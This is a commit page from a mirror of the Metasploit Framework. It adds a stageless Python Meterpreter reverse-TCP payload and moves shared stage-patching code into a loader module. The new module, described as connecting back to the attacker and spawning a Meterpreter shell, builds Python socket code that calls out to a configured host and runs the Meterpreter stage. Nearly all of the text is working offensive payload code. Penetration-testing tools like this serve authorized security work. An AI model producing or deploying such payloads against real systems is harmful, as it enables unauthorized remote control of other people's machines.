infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add stageless Python Meterpreter for reverse tcp

bug/bundler_fix
Spencer McIntyre 2015-10-21 18:23:04 -04:00
parent 129544c18b
commit 8bb694fa5c
3 changed files with 124 additions and 22 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

72
lib/msf/core/payload/python/meterpreter_loader.rb Normal file
View File

@ -0,0 +1,72 @@
# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/payload/uuid/options'
module Msf
###
#
# Common module stub for ARCH_PYTHON payloads that make use of Meterpreter.
#
###
module Payload::Python::MeterpreterLoader
include Msf::Payload::UUID::Options
include Msf::Sessions::MeterpreterOptions
def initialize(info = {})
super(update_info(info,
'Name' => 'Meterpreter & Configuration',
'Description' => 'Run Meterpreter & the configuration stub',
'Author' => [ 'Spencer McIntyre' ],
'Platform' => 'python',
'Arch' => ARCH_PYTHON,
'Stager' => {'Payload' => ""}
))
register_advanced_options([
OptBool.new('PythonMeterpreterDebug', [ true, 'Enable debugging for the Python meterpreter', false ])
], self.class)
end
# Get the raw Python Meterpreter stage and patch in values based on the
# configuration
#
# @param opts [Hash] The options to use for patching the stage data.
# @option opts [String] :stageless_tcp_socket_setup Python code to execute to
# setup a tcp socket to allow use of the stage as a stageless payload.
# @option opts [String] :uuid A specific UUID to use for sessions created by
# this stage.
def stage_meterpreter(opts={})
met = MetasploitPayloads.read('meterpreter', 'meterpreter.py')
if datastore['PythonMeterpreterDebug']
met = met.sub("DEBUGGING = False", "DEBUGGING = True")
end
met.sub!('SESSION_EXPIRATION_TIMEOUT = 604800', "SESSION_EXPIRATION_TIMEOUT = #{datastore['SessionExpirationTimeout']}")
met.sub!('SESSION_COMMUNICATION_TIMEOUT = 300', "SESSION_COMMUNICATION_TIMEOUT = #{datastore['SessionCommunicationTimeout']}")
met.sub!('SESSION_RETRY_TOTAL = 3600', "SESSION_RETRY_TOTAL = #{datastore['SessionRetryTotal']}")
met.sub!('SESSION_RETRY_WAIT = 10', "SESSION_RETRY_WAIT = #{datastore['SessionRetryWait']}")
uuid = opts[:uuid] || generate_payload_uuid
uuid = Rex::Text.to_hex(uuid.to_raw, prefix = '')
met.sub!("PAYLOAD_UUID = \'\'", "PAYLOAD_UUID = \'#{uuid}\'")
# patch in any optional stageless tcp socket setup
unless opts[:stageless_tcp_socket_setup].nil?
socket_setup = opts[:stageless_tcp_socket_setup]
socket_setup = socket_setup.split("\n")
socket_setup.map! {|line| "\t\t#{line}\n"}
socket_setup = socket_setup.join
met.sub!("\t\t# PATCH-SETUP-STAGELESS-TCP-SOCKET #", socket_setup)
end
met
end
end
end

44
modules/payloads/singles/python/meterpreter_reverse_tcp.rb Normal file
View File

@ -0,0 +1,44 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/core/payload/python'
require 'msf/core/payload/python/meterpreter_loader'
require 'msf/core/payload/python/reverse_tcp'
require 'msf/base/sessions/meterpreter_python'
module Metasploit4
CachedSize = 49398
include Msf::Payload::Single
include Msf::Payload::Python
include Msf::Payload::Python::ReverseTcp
include Msf::Payload::Python::MeterpreterLoader
def initialize(info = {})
super(merge_info(info,
'Name' => 'Python Meterpreter Shell, Reverse TCP Inline',
'Description' => 'Connect back to the attacker and spawn a Meterpreter shell',
'Author' => 'Spencer McIntyre',
'License' => MSF_LICENSE,
'Platform' => 'python',
'Arch' => ARCH_PYTHON,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::Meterpreter_Python_Python
))
end
def generate_reverse_tcp(opts={})
socket_setup = "s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n"
socket_setup << "s.connect(('#{opts[:host]}',#{opts[:port]}))\n"
opts[:stageless_tcp_socket_setup] = socket_setup
met = stage_meterpreter(opts)
py_create_exec_stub(met)
end
end

30
modules/payloads/stages/python/meterpreter.rb
View File

@ -5,43 +5,29 @@
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/core/payload/python'
require 'msf/core/payload/python/meterpreter_loader'
require 'msf/base/sessions/meterpreter_python'
require 'msf/base/sessions/meterpreter_options'
module Metasploit3
include Msf::Sessions::MeterpreterOptions
module Metasploit4
include Msf::Payload::Python::MeterpreterLoader
def initialize(info = {})
super(update_info(info,
'Name' => 'Python Meterpreter',
'Description' => 'Run a meterpreter server in Python (2.5-2.7 & 3.1-3.4)',
'Description' => 'Run a meterpreter server in Python (2.5-2.7 & 3.1-3.5)',
'Author' => 'Spencer McIntyre',
'Platform' => 'python',
'Arch' => ARCH_PYTHON,
'License' => MSF_LICENSE,
'Session' => Msf::Sessions::Meterpreter_Python_Python
))
register_advanced_options([
OptBool.new('PythonMeterpreterDebug', [ true, 'Enable debugging for the Python meterpreter', false ])
], self.class)
end
def generate_stage(opts={})
met = MetasploitPayloads.read('meterpreter', 'meterpreter.py')
if datastore['PythonMeterpreterDebug']
met = met.sub("DEBUGGING = False", "DEBUGGING = True")
end
met.sub!('SESSION_EXPIRATION_TIMEOUT = 604800', "SESSION_EXPIRATION_TIMEOUT = #{datastore['SessionExpirationTimeout']}")
met.sub!('SESSION_COMMUNICATION_TIMEOUT = 300', "SESSION_COMMUNICATION_TIMEOUT = #{datastore['SessionCommunicationTimeout']}")
met.sub!('SESSION_RETRY_TOTAL = 3600', "SESSION_RETRY_TOTAL = #{datastore['SessionRetryTotal']}")
met.sub!('SESSION_RETRY_WAIT = 10', "SESSION_RETRY_WAIT = #{datastore['SessionRetryWait']}")
uuid = opts[:uuid] || generate_payload_uuid
uuid = Rex::Text.to_hex(uuid.to_raw, prefix = '')
met.sub!("PAYLOAD_UUID = \'\'", "PAYLOAD_UUID = \'#{uuid}\'")
met
stage_meterpreter(opts)
end
end